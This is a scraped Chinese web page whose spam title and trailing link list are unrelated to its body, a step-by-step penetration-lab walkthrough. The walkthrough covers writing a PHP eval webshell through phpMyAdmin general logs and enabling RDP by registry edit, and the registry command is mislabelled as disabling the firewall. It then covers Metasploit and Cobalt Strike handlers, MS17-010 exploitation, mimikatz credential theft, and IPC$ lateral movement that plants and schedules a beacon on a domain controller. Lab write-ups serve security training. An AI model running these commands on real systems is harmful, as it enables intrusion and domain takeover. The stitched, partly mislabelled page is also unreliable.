当前位置: 首页 > news >正文

怎么在自己的网站上做链接兰州网站建设公司排名

news 2025/9/16 6:25:08
怎么在自己的网站上做链接,兰州网站建设公司排名,梅江区建设局网站,分销平台系统源码环境准备 靶机链接:百度网盘 请输入提取码 提取码:sx22 攻击机系统:kali linux 2022.03 网络配置: win7配置: kali配置: kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4 win7 1…

环境准备

靶机链接:百度网盘 请输入提取码

提取码:sx22

攻击机系统:kali linux 2022.03

网络配置:

win7配置:

kali配置:

kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4

win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3

win8 192.68.52.138 自定义网卡3

win2003 192.168.52.141 自定义网卡3

外网web渗透

1.用dirsearch进行目录扫描

dirsearch -u 192.168.111.128 --exclude-status 400,401,403,404,405,501,503

2.访问后,发现网站绝对路径。

3.访问网址是phpmyadmin的

4.工具爆破用户名密码,成功登录

5.查看是否已开启general 日志

show variables like '%general%';

6.使用set global general_log=on开启general 日志

开启之后数据库所有运行的日志会记录在general_log_file中

7.设置指定日志写入到网站根目录的 111.php 文件

set global general_log_file = 'C:/phpStudy/WWW/l.php';

8.将一句话木马写入 111.php 文件中:

SELECT '<?php eval($_POST[cmd]);?>'

9.蚁剑成功连接,关闭防火墙

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

10.rdesktop 192.168.111.128 远程连接成功

内网渗透

信息收集

1.开启cs,生成木马,上传到蚁剑,执行

2.成功上线cs.进行信息收集

3.发现一个192.168.52.143的网段

4.打印路由信息

5.查看arp信息

6.能都成功ping通52段

渗透2003

1.设置派生监听

2.将cs的shell派生(foreign)到msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.111.129
set lport 9999
run

3.进行提权操作,再进行添加路由

getsystem

run autoroute -s 192.168.52.0/24

run autoroute -p

4.设置代理

use auxiliary/server/socks_proxy

set srvhost 192.168.111.129

run

5.用ms17-010的use2进行渗透

use 2

set rhosts 192.168.52.141

run

6.成功执行,whomi发现是系统权限。

set command whoami

拿下域控

信息收集

1.主机名为stu1,有四个用户

2.查看域用户

shell net user /domain

3.查看域中的主机名

shell net group "domain computers" /domain

4.查看域控制器主机名

shell net group "domain controllers" /domain

域控名字OWA$

5.查看域控制器的主机名,DNS服务器的地址

shell nslookup -type=srv _ldap._tcp

ipc横向移动

1.创建一个smb监听

创建一个windows exe s 木马,选择smb监听

2.run mimikakz,得到域控密码

3.建立公网主机和域控主机的ipc信任

shell net use \\192.168.52.138\ipc$ "Qwer1234" /user:god\administrator

4.net use 发现建立成功后,上传木马程序

6.利用ipc将木马传到域控上

shell copy beacon.exe \\192.168.52.138\c$

7.创建计划任务并执行

shell schtasks /create /s 192.168.52.138 /tn msbtest /sc onstart /tr c:\beacon.exe /ru system /f

shell schtasks /run /s 192.168.52.138 /i /tn "msbtest"

/s 指定目标ip

/tn 指定计划任务名字

/sc onstart 设定开机启动

/tr 启动应用路径

/ru system 以管理员身份运行

8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!

http://www.yayakq.cn/news/132500/

相关文章:

  • 空调维修技术支持东莞网站建设寿光网站建设价格
  • 营销型网站需要注意国外有哪做交互设计网站
  • 教学互动网站开发背景烟台网站建设推广
  • 免费推广店铺的网站网站二级域名打不开
  • 网站别人帮做的要注意什么闵行区网站建设
  • 河南 网站建设自适应网站建设哪家好
  • 如何做一个移动网站wordpress dux 主题
  • 兰州网架公司长春seo服务
  • 网站设计怎么学最好要使用中文目录
  • 做网站推广的价格国家中小学网络云平台
  • 廊坊网站搭建四川华海建设集团有限公司网站
  • 学校网站建设的要点有没有可以做app的网站
  • 如何创建一个企业网站seo网络推广公司排名
  • 网站建设课程设计报告图文个人简历模板免费可编辑
  • 网站建设与网页设计...爱站关键词搜索
  • 怎么样创建网站陕建上海公司官网
  • 优秀网站设计网站宁波怎么建网站模板
  • 网站建设费用IP牛商网做的包装盒网站
  • 外贸网站建设 翻译俄罗斯搜索引擎yandex推广入口
  • 石家庄建站模板源码p2p网站开发思路方案
  • 高端网站建设好的公司眼镜东莞网站建设
  • 怎么下载自己做的网站北京网页制作公司电话
  • 太原做网站的公司网站建设怎么做企业推广
  • 南宁网站建设服务商企业设计网站公司哪家好
  • 网站代备案多少钱网易企业邮箱登入路口
  • 客户为什么要做网站非物质文化遗产网站怎么做
  • 网站图片广告代码枣阳做网站
  • cms优秀网站设计案例新闻最近新闻10条
  • 网站群管理平台方案窝窝网
  • 做网站需要注册公司吗专升本可以报考哪些大学